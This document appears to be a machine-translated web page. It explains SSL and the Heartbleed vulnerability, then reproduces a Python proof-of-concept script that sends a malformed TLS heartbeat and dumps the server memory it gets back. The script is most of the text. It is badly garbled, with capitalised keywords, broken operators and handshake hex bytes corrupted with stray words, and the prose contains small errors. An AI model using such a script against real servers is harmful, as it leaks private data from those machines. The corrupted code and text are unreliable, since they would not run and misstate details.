What is SSL?
SSL is a popular encryption technology that can protect the privacy information that users transmit over the Internet. After the website uses this encryption technology, third parties cannot read any communication between you and the website. In the background, encrypted data over SSL can only be decrypted by the recipient.
SSL was first introduced by Netscape in 1994 and has been adopted by all major browsers since the 1990.
What is a "heart bleed" vulnerability?
The SSL standard includes a heartbeat option that allows the computer on one end of the SSL connection to send a brief message confirming that the other end of the computer is still online and getting feedback. The researchers found that it was possible to send malicious heartbeat information through ingenious means, cheating the other end of the computer to divulge confidential information. The affected computer may be deceived and send information from the server's memory.
Who found out about this problem?
The vulnerability was discovered independently by researchers at Codenomicon and Google's security services. To minimize the impact, researchers have partnered with the OpenSSL team and other key insiders to prepare the fix before releasing the issue.
Python script to detect the OpenSSL heart Bleed vulnerability
Copy the Code code as follows:
#!/usr/bin/python
# Quick and dirty demonstration of cve-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The Author disclaims copyright to this source code.
Import Sys
Import struct
Import socket
Import time
Import Select
Import re
From Optparse import Optionparser
Options = Optionparser (usage= '%prog server [options] ', description= ' Test for SSL Heartbeat Vulnerability (CVE-2014-0160) ')
Options.add_option ('-P ', '--port ', type= ' int ', default=443, help= ' TCP port to test (default:443) ')
def h2bin (x):
Return X.replace (', '). replace (' \ n ', '). Decode (' hex ')
Hello = H2bin ("'
03 02 53 D8 DC
5b 9d 9b, 0b BC 0c BC 2b A8 (CF)
bd 00 CC 0a (9f) D4 de, Geneva
C0 C0 0a C0 C0 21 00 39 00 38 00 88
C0 0f c0 c0 c0 c0 1c (XX)
C0 1b C0 0d c0 0a c0 c0 09
C0 1f C0 1e 00 99 00 45 00 44
C0 0e C0 2f xx c0 c0 c0 0c
C0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 04 of the FF at the same
0a, 0e, 0d, 00 19
0b 0c 00 (0a 00 16 00 17 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
0f 00 10 00 11 00 23 00 00
0f 00 01 01
''')
HB = H2bin ("'
18 03 02) 00 03
01 40 00
''')
def hexdump (s):
For B in xrange (0, Len (s), 16):
Lin = [C for C in S[b:b + 16]]
Hxdat = '. Join ('%02x '% ord (c) for C in Lin)
Pdat = '. Join (c if <= Ord (c) <= 126 else '. ') For C in Lin)
print '%04x:%-48s%s '% (b, Hxdat, Pdat)
Print
def recvall (s, Length, timeout=5):
Endtime = time.time () + timeout
Rdata = ' '
remain = length
While remain > 0:
Rtime = Endtime-time.time ()
If Rtime < 0:
Return None
R, W, E = Select.select ([s], [], [], 5)
If s in R:
data = S.RECV (Remain)
# EOF?
If not data:
Return None
Rdata + = Data
Remain-= Len (data)
return Rdata
def recvmsg (s):
HDR = Recvall (S, 5)
If HDR is None:
print ' unexpected EOF receiving record header-server closed connection '
Return None, none, none
Typ, ver, ln = struct.unpack (' >bhh ', hdr)
Pay = Recvall (s, LN, 10)
If Pay is None:
print ' unexpected EOF receiving record payload-server closed connection '
Return None, none, none
print ' ... received message:type =%d, ver =%04x, length =%d '% (Typ, ver, len (pay))
Return Typ, ver, pay
def HIT_HB (s):
S.send (HB)
While True:
Typ, ver, pay = recvmsg (s)
If Typ is None:
print ' No heartbeat response received, server likely not vulnerable '
Return False
If Typ = = 24:
print ' Received heartbeat response: '
Hexdump (Pay)
If Len (Pay) > 3:
print ' Warning:server returned more data than it Should-server is vulnerable! '
Else
print ' Server processed malformed heartbeat, but does not return any extra data. '
Return True
if Typ = = 21:
print ' Received alert: '
Hexdump (Pay)
print ' Server returned error, likely not vulnerable '
Return False
def main ():
opts, args = Options.parse_args ()
If Len (args) < 1:
Options.print_help ()
Return
s = socket.socket (socket.af_inet, socket. SOCK_STREAM)
print ' Connecting ... '
Sys.stdout.flush ()
S.connect ((Args[0], opts.port))
print ' Sending Client Hello ... '
Sys.stdout.flush ()
S.send (Hello)
print ' Waiting for Server Hello ... '
Sys.stdout.flush ()
While True:
Typ, ver, pay = recvmsg (s)
if Typ = = None:
print ' server closed connection without sending server Hello. '
Return
# Look for server Hello-Done message.
if Typ = = and Ord (pay[0]) = = 0x0E:
Break
print ' Sending heartbeat request ... '
Sys.stdout.flush ()
S.send (HB)
HIT_HB (s)
if __name__ = = ' __main__ ':
Main ()